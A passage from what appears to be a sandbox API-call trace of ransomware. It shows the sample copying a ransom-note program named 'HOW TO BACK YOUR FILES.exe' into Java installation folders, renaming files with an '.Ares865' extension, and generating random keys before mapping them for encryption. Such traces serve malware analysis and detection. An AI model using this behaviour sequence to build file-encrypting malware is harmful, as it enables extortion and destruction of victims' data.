lpString2="win32_LinkNoDrop32x32.gif" | out: lpString1="win32_LinkNoDrop32x32.gif") returned="win32_LinkNoDrop32x32.gif" [0056.333] lstrlenW (lpString="win32_LinkNoDrop32x32.gif") returned 25 [0056.333] lstrlenW (lpString="Ares865") returned 7 [0056.333] lstrcmpiW (lpString1="x32.gif", lpString2="Ares865") returned 1 [0056.333] lstrcpyW (in: lpString1=0x2e2e8c8, lpString2="win32_MoveDrop32x32.gif" | out: lpString1="win32_MoveDrop32x32.gif") returned="win32_MoveDrop32x32.gif" [0056.333] lstrlenW (lpString="win32_MoveDrop32x32.gif") returned 23 [0056.333] lstrlenW (lpString="Ares865") returned 7 [0056.333] lstrcmpiW (lpString1="x32.gif", lpString2="Ares865") returned 1 [0056.333] lstrcpyW (in: lpString1=0x2e2e8c8, lpString2="win32_MoveNoDrop32x32.gif" | out: lpString1="win32_MoveNoDrop32x32.gif") returned="win32_MoveNoDrop32x32.gif" [0056.333] lstrlenW (lpString="win32_MoveNoDrop32x32.gif") returned 25 [0056.333] lstrlenW (lpString="Ares865") returned 7 [0056.333] lstrcmpiW (lpString1="x32.gif", lpString2="Ares865") returned 1 [0056.333] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386" [0056.333] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df950 | out: hHeap=0x2b0000) returned 1 [0056.333] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0056.333] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386") returned 41 [0056.333] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386" [0056.333] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.333] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\i386\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.338] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.338] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\i386\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74496dc0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x53153860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53153860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.338] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.338] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.338] lstrcpyW (in: lpString1=0x2e2e8b4, lpString2="jvm.cfg" | out: lpString1="jvm.cfg") returned="jvm.cfg" [0056.338] lstrlenW (lpString="jvm.cfg") returned 7 [0056.338] lstrlenW (lpString="Ares865") returned 7 [0056.338] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts" [0056.338] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df8f0 | out: hHeap=0x2b0000) returned 1 [0056.339] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0056.339] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts") returned 42 [0056.339] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts" [0056.339] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.339] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.353] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.353] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74496dc0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x531799c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x531799c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.353] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.353] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.353] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="LucidaBrightDemiBold.ttf" | out: lpString1="LucidaBrightDemiBold.ttf") returned="LucidaBrightDemiBold.ttf" [0056.353] lstrlenW (lpString="LucidaBrightDemiBold.ttf") returned 24 [0056.353] lstrlenW (lpString="Ares865") returned 7 [0056.353] lstrcmpiW (lpString1="old.ttf", lpString2="Ares865") returned 1 [0056.353] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="LucidaBrightDemiItalic.ttf" | out: lpString1="LucidaBrightDemiItalic.ttf") returned="LucidaBrightDemiItalic.ttf" [0056.353] lstrlenW (lpString="LucidaBrightDemiItalic.ttf") returned 26 [0056.353] lstrlenW (lpString="Ares865") returned 7 [0056.354] lstrcmpiW (lpString1="lic.ttf", lpString2="Ares865") returned 1 [0056.354] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="LucidaBrightItalic.ttf" | out: lpString1="LucidaBrightItalic.ttf") returned="LucidaBrightItalic.ttf" [0056.354] lstrlenW (lpString="LucidaBrightItalic.ttf") returned 22 [0056.354] lstrlenW (lpString="Ares865") returned 7 [0056.354] lstrcmpiW (lpString1="lic.ttf", lpString2="Ares865") returned 1 [0056.354] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="LucidaBrightRegular.ttf" | out: lpString1="LucidaBrightRegular.ttf") returned="LucidaBrightRegular.ttf" [0056.354] lstrlenW (lpString="LucidaBrightRegular.ttf") returned 23 [0056.354] lstrlenW (lpString="Ares865") returned 7 [0056.354] lstrcmpiW (lpString1="lar.ttf", lpString2="Ares865") returned 1 [0056.354] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="LucidaSansDemiBold.ttf" | out: lpString1="LucidaSansDemiBold.ttf") returned="LucidaSansDemiBold.ttf" [0056.354] lstrlenW (lpString="LucidaSansDemiBold.ttf") returned 22 [0056.354] lstrlenW (lpString="Ares865") returned 7 [0056.354] lstrcmpiW (lpString1="old.ttf", lpString2="Ares865") returned 1 [0056.354] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="LucidaSansRegular.ttf" | out: lpString1="LucidaSansRegular.ttf") returned="LucidaSansRegular.ttf" [0056.354] lstrlenW (lpString="LucidaSansRegular.ttf") returned 21 [0056.354] lstrlenW (lpString="Ares865") returned 7 [0056.354] lstrcmpiW (lpString1="lar.ttf", lpString2="Ares865") returned 1 [0056.354] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="LucidaTypewriterBold.ttf" | out: lpString1="LucidaTypewriterBold.ttf") returned="LucidaTypewriterBold.ttf" [0056.354] lstrlenW (lpString="LucidaTypewriterBold.ttf") returned 24 [0056.354] lstrlenW (lpString="Ares865") returned 7 [0056.354] lstrcmpiW (lpString1="old.ttf", lpString2="Ares865") returned 1 [0056.354] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="LucidaTypewriterRegular.ttf" | out: lpString1="LucidaTypewriterRegular.ttf") returned="LucidaTypewriterRegular.ttf" [0056.355] lstrlenW (lpString="LucidaTypewriterRegular.ttf") returned 27 [0056.355] lstrlenW (lpString="Ares865") returned 7 [0056.355] lstrcmpiW (lpString1="lar.ttf", lpString2="Ares865") returned 1 [0056.355] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext" [0056.355] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df890 | out: hHeap=0x2b0000) returned 1 [0056.355] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0056.355] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext") returned 40 [0056.355] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext" [0056.355] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.355] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.361] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.361] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74470c60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5319fb20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5319fb20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.361] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.361] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.361] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="access-bridge-32.jar" | out: lpString1="access-bridge-32.jar") returned="access-bridge-32.jar" [0056.361] lstrlenW (lpString="access-bridge-32.jar") returned 20 [0056.361] lstrlenW (lpString="Ares865") returned 7 [0056.361] lstrcmpiW (lpString1="-32.jar", lpString2="Ares865") returned -1 [0056.361] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="dnsns.jar" | out: lpString1="dnsns.jar") returned="dnsns.jar" [0056.361] lstrlenW (lpString="dnsns.jar") returned 9 [0056.361] lstrlenW (lpString="Ares865") returned 7 [0056.361] lstrcmpiW (lpString1="sns.jar", lpString2="Ares865") returned 1 [0056.362] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="jaccess.jar" | out: lpString1="jaccess.jar") returned="jaccess.jar" [0056.362] lstrlenW (lpString="jaccess.jar") returned 11 [0056.362] lstrlenW (lpString="Ares865") returned 7 [0056.362] lstrcmpiW (lpString1="ess.jar", lpString2="Ares865") returned 1 [0056.362] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="localedata.jar" | out: lpString1="localedata.jar") returned="localedata.jar" [0056.362] lstrlenW (lpString="localedata.jar") returned 14 [0056.362] lstrlenW (lpString="Ares865") returned 7 [0056.362] lstrcmpiW (lpString1="ata.jar", lpString2="Ares865") returned 1 [0056.362] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="meta-index" | out: lpString1="meta-index") returned="meta-index" [0056.362] lstrlenW (lpString="meta-index") returned 10 [0056.362] lstrlenW (lpString="Ares865") returned 7 [0056.362] lstrcmpiW (lpString1="a-index", lpString2="Ares865") returned -1 [0056.362] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="sunec.jar" | out: lpString1="sunec.jar") returned="sunec.jar" [0056.362] lstrlenW (lpString="sunec.jar") returned 9 [0056.362] lstrlenW (lpString="Ares865") returned 7 [0056.362] lstrcmpiW (lpString1="nec.jar", lpString2="Ares865") returned 1 [0056.362] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="sunjce_provider.jar" | out: lpString1="sunjce_provider.jar") returned="sunjce_provider.jar" [0056.362] lstrlenW (lpString="sunjce_provider.jar") returned 19 [0056.362] lstrlenW (lpString="Ares865") returned 7 [0056.362] lstrcmpiW (lpString1="der.jar", lpString2="Ares865") returned 1 [0056.362] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="sunmscapi.jar" | out: lpString1="sunmscapi.jar") returned="sunmscapi.jar" [0056.362] lstrlenW (lpString="sunmscapi.jar") returned 13 [0056.362] lstrlenW (lpString="Ares865") returned 7 [0056.362] lstrcmpiW (lpString1="api.jar", lpString2="Ares865") returned -1 [0056.363] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="sunpkcs11.jar" | out: lpString1="sunpkcs11.jar") returned="sunpkcs11.jar" [0056.363] lstrlenW (lpString="sunpkcs11.jar") returned 13 [0056.363] lstrlenW (lpString="Ares865") returned 7 [0056.363] lstrcmpiW (lpString1="s11.jar", lpString2="Ares865") returned 1 [0056.363] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="zipfs.jar" | out: lpString1="zipfs.jar") returned="zipfs.jar" [0056.363] lstrlenW (lpString="zipfs.jar") returned 9 [0056.363] lstrlenW (lpString="Ares865") returned 7 [0056.363] lstrcmpiW (lpString1="pfs.jar", lpString2="Ares865") returned 1 [0056.363] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy" [0056.363] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df830 | out: hHeap=0x2b0000) returned 1 [0056.363] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0056.363] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy") returned 43 [0056.363] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy" [0056.363] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.363] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.369] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.369] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74470c60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5319fb20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5319fb20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.369] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.369] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.369] lstrcpyW (in: lpString1=0x2e2e8b8, lpString2="ffjcext.zip" | out: lpString1="ffjcext.zip") returned="ffjcext.zip" [0056.369] lstrlenW (lpString="ffjcext.zip") returned 11 [0056.370] lstrlenW (lpString="Ares865") returned 7 [0056.370] lstrcmpiW (lpString1="ext.zip", lpString2="Ares865") returned 1 [0056.370] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip.Ares865") returned 63 [0056.370] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\ffjcext.zip"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\ffjcext.zip.ares865"), dwFlags=0x1) returned 1 [0056.371] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\ffjcext.zip.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\ffjcext.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0056.371] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=18636) returned 1 [0056.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0056.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0056.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0056.371] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0056.372] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0056.372] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0056.372] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4bd0, lpName=0x0) returned 0x15c [0056.374] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4bd0) returned 0x190000 [0056.376] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0056.376] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0056.376] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0056.376] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8eb8 [0056.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0056.376] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0056.376] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0056.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0056.377] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0056.377] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0056.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0056.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0056.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0056.377] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0056.377] CloseHandle (hObject=0x15c) returned 1 [0056.377] CloseHandle (hObject=0x118) returned 1 [0056.379] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0056.379] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0056.379] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0056.379] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5319fb20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5319fb20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0056.379] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0056.379] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74470c60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x74470c60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x74470c60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jqs", cAlternateFileName="")) returned 1 [0056.379] lstrcmpiW (lpString1="jqs", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.379] lstrcmpiW (lpString1="jqs", lpString2="aoldtz.exe") returned 1 [0056.379] lstrcpyW (in: lpString1=0x2e2e8b8, lpString2="jqs" | out: lpString1="jqs") returned="jqs" [0056.379] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0056.379] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x60) returned 0x2f1fc8 [0056.379] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7b70 | out: ListHead=0x2e77d0, ListEntry=0x2e7b70) returned 0x2e7b50 [0056.379] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74470c60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x74470c60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x74470c60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xb2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="messages.properties", cAlternateFileName="MESSAG~1.PRO")) returned 1 [0056.379] lstrcmpiW (lpString1="messages.properties", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.379] lstrcmpiW (lpString1="messages.properties", lpString2="aoldtz.exe") returned 1 [0056.379] lstrcpyW (in: lpString1=0x2e2e8b8, lpString2="messages.properties" | out: lpString1="messages.properties") returned="messages.properties" [0056.379] lstrlenW (lpString="messages.properties") returned 19 [0056.379] lstrlenW (lpString="Ares865") returned 7 [0056.380] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0056.380] lstrcpyW (in: lpString1=0x2e2e8b8, lpString2="messages_de.properties" | out: lpString1="messages_de.properties") returned="messages_de.properties" [0056.380] lstrlenW (lpString="messages_de.properties") returned 22 [0056.380] lstrlenW (lpString="Ares865") returned 7 [0056.380] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0056.380] lstrcpyW (in: lpString1=0x2e2e8b8, lpString2="messages_es.properties" | out: lpString1="messages_es.properties") returned="messages_es.properties" [0056.380] lstrlenW (lpString="messages_es.properties") returned 22 [0056.380] lstrlenW (lpString="Ares865") returned 7 [0056.380] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0056.380] lstrcpyW (in: lpString1=0x2e2e8b8, lpString2="messages_fr.properties" | out: lpString1="messages_fr.properties") returned="messages_fr.properties" [0056.380] lstrlenW (lpString="messages_fr.properties") returned 22 [0056.380] lstrlenW (lpString="Ares865") returned 7 [0056.380] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0056.380] lstrcpyW (in: lpString1=0x2e2e8b8, lpString2="messages_it.properties" | out: lpString1="messages_it.properties") returned="messages_it.properties" [0056.380] lstrlenW (lpString="messages_it.properties") returned 22 [0056.380] lstrlenW (lpString="Ares865") returned 7 [0056.380] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0056.380] lstrcpyW (in: lpString1=0x2e2e8b8, lpString2="messages_ja.properties" | out: lpString1="messages_ja.properties") returned="messages_ja.properties" [0056.380] lstrlenW (lpString="messages_ja.properties") returned 22 [0056.380] lstrlenW (lpString="Ares865") returned 7 [0056.380] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0056.380] lstrcpyW (in: lpString1=0x2e2e8b8, lpString2="messages_ko.properties" | out: lpString1="messages_ko.properties") returned="messages_ko.properties" [0056.381] lstrlenW (lpString="messages_ko.properties") returned 22 [0056.381] lstrlenW (lpString="Ares865") returned 7 [0056.381] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0056.381] lstrcpyW (in: lpString1=0x2e2e8b8, lpString2="messages_pt_BR.properties" | out: lpString1="messages_pt_BR.properties") returned="messages_pt_BR.properties" [0056.381] lstrlenW (lpString="messages_pt_BR.properties") returned 25 [0056.381] lstrlenW (lpString="Ares865") returned 7 [0056.381] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0056.381] lstrcpyW (in: lpString1=0x2e2e8b8, lpString2="messages_sv.properties" | out: lpString1="messages_sv.properties") returned="messages_sv.properties" [0056.381] lstrlenW (lpString="messages_sv.properties") returned 22 [0056.381] lstrlenW (lpString="Ares865") returned 7 [0056.381] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0056.381] lstrcpyW (in: lpString1=0x2e2e8b8, lpString2="messages_zh_CN.properties" | out: lpString1="messages_zh_CN.properties") returned="messages_zh_CN.properties" [0056.381] lstrlenW (lpString="messages_zh_CN.properties") returned 25 [0056.381] lstrlenW (lpString="Ares865") returned 7 [0056.381] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0056.381] lstrcpyW (in: lpString1=0x2e2e8b8, lpString2="messages_zh_HK.properties" | out: lpString1="messages_zh_HK.properties") returned="messages_zh_HK.properties" [0056.381] lstrlenW (lpString="messages_zh_HK.properties") returned 25 [0056.381] lstrlenW (lpString="Ares865") returned 7 [0056.381] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0056.381] lstrcpyW (in: lpString1=0x2e2e8b8, lpString2="messages_zh_TW.properties" | out: lpString1="messages_zh_TW.properties") returned="messages_zh_TW.properties" [0056.381] 